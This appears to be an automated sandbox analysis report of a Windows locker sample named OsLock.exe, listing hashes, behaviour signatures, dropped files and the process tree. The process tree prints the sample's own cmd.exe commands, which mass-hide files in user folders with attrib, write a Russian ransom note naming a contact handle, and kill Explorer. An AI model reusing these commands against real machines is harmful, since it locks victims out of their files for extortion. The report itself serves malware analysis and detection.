Analysis

  • max time kernel
    15s
  • max time network
    19s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    22/11/2024, 09:20

General

  • Target

    OsLock.exe

  • Size

    385KB

  • MD5

    675ea787630f596da0474830ffb49723

  • SHA1

    c8e18cbc3cca1ded47eb5860a71b9f22d46409e1

  • SHA256

    ad861f41bb4a31ee778bf60cecf0a7bdd9c0cc91d5cc17775d15199c214fbccf

  • SHA512

    fa3c2c6edd3435bd16ec652c1738695cd1e8cdbd010b55fd856cefdbebd50552074d06e9b66860fae9c3a2f71ffe1076bb0227944b49286f05e1a3a4c871014d

  • SSDEEP

    6144:Z1IE/9oydPc4IvjTZlyZsDDyr3rAUp48zUCpM69/KImQi/6ebkY:Z1vlc4IrTZlyGDc54

Malware Config

Signatures

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Drops startup file 1 IoCs
  • Adds Run key to start application 2 TTPs 13 IoCs
  • Drops desktop.ini file(s) 45 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 6 IoCs
  • Kills process with taskkill 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 57 IoCs
  • Views/modifies file attributes 1 TTPs 12 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\OsLock.exe
    "C:\Users\Admin\AppData\Local\Temp\OsLock.exe"
    1⤵
    • Modifies WinLogon for persistence
    • Adds Run key to start application
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2792
    • C:\Windows\system32\cmd.exe
      cmd.exe /c F: & attrib +h +s +r +i /D /S * & echo [%RANDOM%] Упсик Твои файлы Зашифрованы! Пиши @N0TK4RMA 1>info-0v92.txt & attrib -h +s +r info-lox.txt
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • Suspicious use of WriteProcessMemory
      PID:2836
      • C:\Windows\system32\attrib.exe
        attrib +h +s +r +i /D /S *
        3⤵
        • Drops desktop.ini file(s)
        • Views/modifies file attributes
        PID:2440
      • C:\Windows\system32\attrib.exe
        attrib -h +s +r info-lox.txt
        3⤵
        • Views/modifies file attributes
        PID:2600
    • C:\Windows\system32\cmd.exe
      cmd.exe /c cd "%userprofile%\desktop"&attrib +h +s +r +i /D /S * & echo [%RANDOM%] Упсик Твои файлы Зашифрованы! Пиши @N0TK4RMA 1>info-0v92.txt & attrib -h +s +r info-lox.txt
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • Suspicious use of WriteProcessMemory
      PID:2720
      • C:\Windows\system32\attrib.exe
        attrib +h +s +r +i /D /S *
        3⤵
        • Drops desktop.ini file(s)
        • Views/modifies file attributes
        PID:1660
      • C:\Windows\system32\attrib.exe
        attrib -h +s +r info-lox.txt
        3⤵
        • Views/modifies file attributes
        PID:2252
    • C:\Windows\system32\cmd.exe
      cmd.exe /c cd "%systemdrive%\Users\Public\Desktop"&attrib +h +s +r +i /D /S * & echo [%RANDOM%] Упсик Твои файлы Зашифрованы! Пиши @N0TK4RMA 1>info-0v92.txt & attrib -h +s +r info-lox.txt
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • Suspicious use of WriteProcessMemory
      PID:2456
      • C:\Windows\system32\attrib.exe
        attrib +h +s +r +i /D /S *
        3⤵
        • Drops desktop.ini file(s)
        • Views/modifies file attributes
        PID:2304
      • C:\Windows\system32\attrib.exe
        attrib -h +s +r info-lox.txt
        3⤵
        • Views/modifies file attributes
        PID:2612
    • C:\Windows\system32\cmd.exe
      cmd.exe /c cd "%userprofile%\downloads"&attrib +h +s +r +i /D /S * & echo [%RANDOM%] Упсик Твои файлы Зашифрованы! Пиши @N0TK4RMA 1>info-0v92.txt & attrib -h +s +r info-lox.txt
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • Suspicious use of WriteProcessMemory
      PID:3004
      • C:\Windows\system32\attrib.exe
        attrib +h +s +r +i /D /S *
        3⤵
        • Drops desktop.ini file(s)
        • Views/modifies file attributes
        PID:2712
      • C:\Windows\system32\attrib.exe
        attrib -h +s +r info-lox.txt
        3⤵
        • Views/modifies file attributes
        PID:2608
    • C:\Windows\system32\cmd.exe
      cmd.exe /c cd "%userprofile%\documents"&attrib +h +s +r +i /D /S * & echo [%RANDOM%] Упсик Твои файлы Зашифрованы! Пиши @N0TK4RMA 1>info-0v92.txt & attrib -h +s +r info-lox.txt
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • Suspicious use of WriteProcessMemory
      PID:2872
      • C:\Windows\system32\attrib.exe
        attrib +h +s +r +i /D /S *
        3⤵
        • Drops desktop.ini file(s)
        • Views/modifies file attributes
        PID:2724
      • C:\Windows\system32\attrib.exe
        attrib -h +s +r info-lox.txt
        3⤵
        • Views/modifies file attributes
        PID:2832
    • C:\Windows\system32\cmd.exe
      cmd.exe /c cd "%userprofile%"&attrib +h +s +r +i /D /S * & echo [%RANDOM%] Упсик Твои файлы Зашифрованы! Пиши @N0TK4RMA 1>info-0v92.txt & attrib -h +s +r info-lox.txt
      2⤵
      • Hide Artifacts: Hidden Files and Directories
      • Suspicious use of WriteProcessMemory
      PID:2928
      • C:\Windows\system32\attrib.exe
        attrib +h +s +r +i /D /S *
        3⤵
        • Drops startup file
        • Drops desktop.ini file(s)
        • Views/modifies file attributes
        PID:2596
      • C:\Windows\system32\attrib.exe
        attrib -h +s +r info-lox.txt
        3⤵
        • Views/modifies file attributes
        PID:1168
    • C:\Windows\system32\taskkill.exe
      taskkill.exe /im Explorer.exe /f
      2⤵
      • Kills process with taskkill
      • Suspicious use of AdjustPrivilegeToken
      PID:2748

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\$unlocker_id.ux-cryptobytes

    Filesize

    6B

    MD5

    077e9aa9444bcf28541070cd97c81aa6

    SHA1

    2852e06b451e586b90203eae63c90c5d770214be

    SHA256

    859dba5497589ef1afb7e49275e3f3304ed1cad7412decbd56248002d904f0c2

    SHA512

    063d675dc30a33e99d63ac842b367ed35d0cd1e336058f4bfe8eb53e5e99797af196e311c7898935c7f8202c75cdda971187c1ec5f850f02780ac161c935291e

  • C:\Users\Admin\Desktop\info-0v92.txt

    Filesize

    56B

    MD5

    aeaa91ff5575a8dde8fba70e66040648

    SHA1

    917769bed9179d32dd0acd7114c2ddfd4ef4baf3

    SHA256

    83129a453e70013d996f9b1acc3ecf4a1e8199d934ccbaedd0d8ec80457bc8f6

    SHA512

    0eb06705ec330f018f5992a40b858c975cf236d86970f580e275218d1a6f9a145c2503a5b5f1918894cac43673729a94e2a42dfc4173cc6c99ac965f6b2b358b

  • memory/2792-0-0x000007FEF5E03000-0x000007FEF5E04000-memory.dmp

    Filesize

    4KB

  • memory/2792-1-0x00000000009A0000-0x0000000000A06000-memory.dmp

    Filesize

    408KB

  • memory/2792-2-0x000007FEF5E00000-0x000007FEF67EC000-memory.dmp

    Filesize

    9.9MB

  • memory/2792-6-0x000007FEF5E00000-0x000007FEF67EC000-memory.dmp

    Filesize

    9.9MB

  • memory/2792-10-0x000007FEF5E00000-0x000007FEF67EC000-memory.dmp

    Filesize

    9.9MB

  • memory/2792-18-0x000007FEF5E03000-0x000007FEF5E04000-memory.dmp

    Filesize

    4KB

  • memory/2792-19-0x000007FEF5E00000-0x000007FEF67EC000-memory.dmp

    Filesize

    9.9MB

  • memory/2792-20-0x000007FEF5E00000-0x000007FEF67EC000-memory.dmp

    Filesize

    9.9MB

  • memory/2792-21-0x000007FEF5E00000-0x000007FEF67EC000-memory.dmp

    Filesize

    9.9MB